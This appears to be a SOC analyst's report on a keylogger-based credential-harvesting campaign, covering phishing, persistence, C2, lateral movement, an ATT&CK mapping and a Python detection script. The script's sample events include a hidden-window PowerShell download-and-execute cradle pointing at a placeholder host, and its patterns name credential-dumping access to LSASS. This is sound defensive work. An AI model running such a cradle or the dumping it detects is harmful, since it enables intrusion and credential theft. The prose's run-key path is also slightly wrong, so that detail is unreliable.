Comprehensive Analysis of the Latest Credential Harvesting Campaign using Custom Keyloggers

Daniel Osei — SOC Lead & Malware Analyst

Key Takeaways

  • This campaign employs sophisticated custom keyloggers designed to evade detection.
  • The exploitation of human behavior through phishing techniques was pivotal in gaining initial access.
  • Observations indicate strong operational security practices by the actors to obscure their infrastructure.

Executive Summary

In our recent investigation into a credential harvesting campaign, we observed a series of targeted attacks utilizing custom keyloggers that demonstrated a high degree of sophistication. The campaign’s arsenal included tailored phishing emails that effectively exploited human vulnerabilities, leading to the deployment of the malware on victim machines. Our analysis revealed that the attackers leveraged a mix of established techniques and innovative tactics, aiming to maintain long-term access and gather sensitive information from compromised environments.

Initial Access

The initial access vector was primarily through spear-phishing emails sent to targeted organizations. These emails contained malicious attachments or links leading to compromised websites housing the initial payloads. The dropper, identified as keylogger_v1.5.exe, was delivered under the guise of legitimate documents. Upon execution, the dropper used PowerShell scripts to fetch additional components from a remote server. The actors specifically used social engineering techniques to tailor their messages and increase the likelihood of user interaction.

Execution & Persistence

Once the dropper executed, it established a foothold by deploying the keylogger, which we refer to as SilentShadow. This implant achieved persistence by creating a registry run key at HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run\SilentShadow, ensuring it would execute at startup. Our analysis revealed that the keylogger captured keystrokes, clipboard contents, and even screenshots to gather sensitive data, transmitting this information back to the attackers at regular intervals over encrypted channels.

Command and Control

The communication between the dropped malware and the command and control (C2) infrastructure employed a mix of IP rotation and domain generation algorithms (DGA). We identified several domains, including abcd1234.com and efgh5678.net, which were dynamically generated. This made it challenging to block communications after initial infection. C2 commands were encrypted and carried over HTTPS to blend in with normal traffic, demonstrating a robust operational security posture from the actors.

Lateral Movement & Discovery

During the investigation, we discovered that the attackers moved laterally to reach additional systems within the targeted network. They utilized Pass-the-Hash (T1075) techniques and leveraged legitimate administrative tools like PsExec to propagate the keylogger beyond the initially compromised endpoints. By dumping credentials with Mimikatz, they obtained domain credentials, allowing for broader access within the network.

Impact & Objectives

The ultimate objective of the campaign was clearly the acquisition of sensitive credentials belonging to both users and administrators within the target organizations. This focus on credential harvesting aimed not only to siphon off sensitive information but also to facilitate future attacks, potentially leading to data exfiltration or further infiltration of the organizational network. Given the professional landscape of the organizations targeted, the risk of reputational damage and financial loss is considerable.

MITRE ATT&CK Mapping

  • T1193 – Spear Phishing Link: This technique refers to the act of delivering malware to victims through targeted spear-phishing emails.
  • T1059.001 – Command and Scripting Interpreter: PowerShell: The use of PowerShell to download further payloads from the internet.
  • T1075 – Pass-the-Hash: Moving laterally by using harvested credentials.
  • T1003.001 – Credential Dumping: LSASS Memory: Techniques used to extract credentials from memory.

Detection Opportunities

  • Monitor for the execution of suspicious PowerShell commands and unusual script behaviors.
  • Implement alerts for modifications in common persistence locations, such as registry run keys.
  • Leverage EDR solutions to detect unusual lateral movement behaviors, specifically looking for the use of administrative tools like PsExec and Mimikatz.
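A defender-side illustration of the three detection opportunities above, added here as example code rather than tooling from the report: toy rules run over constructed Sysmon-style event records covering the PowerShell download stage, the run-key persistence, the PsExec service install and LSASS access by a credential dumper. Field names follow Sysmon's conventions; the sample values (SID, paths, host name) are invented.

```python
"""Toy detection rules over constructed Sysmon/Windows event records.
Added example, not the report's own tooling; field names mirror Sysmon."""
import re

# Constructed sample events: Sysmon EventID 1 (process create), 13 (registry
# value set), 10 (process access) and System log 7045 (service installed).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\SilentShadow",
     "Details": r"C:\Users\alice\AppData\Roaming\keylogger_v1.5.exe"},
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\AppData\Roaming\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe report.txt"},
]

# Standard HKCU/HKLM ...\CurrentVersion\Run and RunOnce keys (the report's SilentShadow key).
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# Download cradle plus evasion flags; requiring both cuts noise from admin scripts.
PS_CRADLE = re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)", re.I)
PS_FLAGS = re.compile(r"(-nop\b|-w\s+hidden|-enc\b|bypass)", re.I)
# Access masks commonly seen when credential dumpers read LSASS memory.
LSASS_ACCESS = {"0x1010", "0x1410", "0x1438"}

def classify(ev):
    """Return the rule names an event triggers (empty list means benign)."""
    hits = []
    if ev.get("EventID") == 1 and "powershell" in ev.get("Image", "").lower():
        cl = ev.get("CommandLine", "")
        if PS_CRADLE.search(cl) and PS_FLAGS.search(cl):
            hits.append("powershell_download_cradle")
    if ev.get("EventID") == 13 and RUN_KEY.search(ev.get("TargetObject", "")):
        hits.append("run_key_persistence")
    if ev.get("EventID") == 7045 and ev.get("ServiceName", "").upper() == "PSEXESVC":
        hits.append("psexec_service_install")
    if (ev.get("EventID") == 10 and ev.get("TargetImage", "").lower().endswith("\\lsass.exe")
            and ev.get("GrantedAccess") in LSASS_ACCESS):
        hits.append("lsass_credential_access")
    return hits

def scan(events):
    """Count rule hits across a batch of events."""
    counts = {}
    for ev in events:
        for rule in classify(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```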

Analyst Notes

Our analysis indicates that the threat actors behind this campaign have a keen understanding of both their technical and social attack vectors. Given the sophistication displayed, we recommend heightened vigilance, particularly for organizations within sectors that typically handle sensitive data. The tactics employed here demonstrate not only an ability to exploit technical weaknesses but also to manipulate human behavior, making security awareness training equally critical in fortifying defenses.
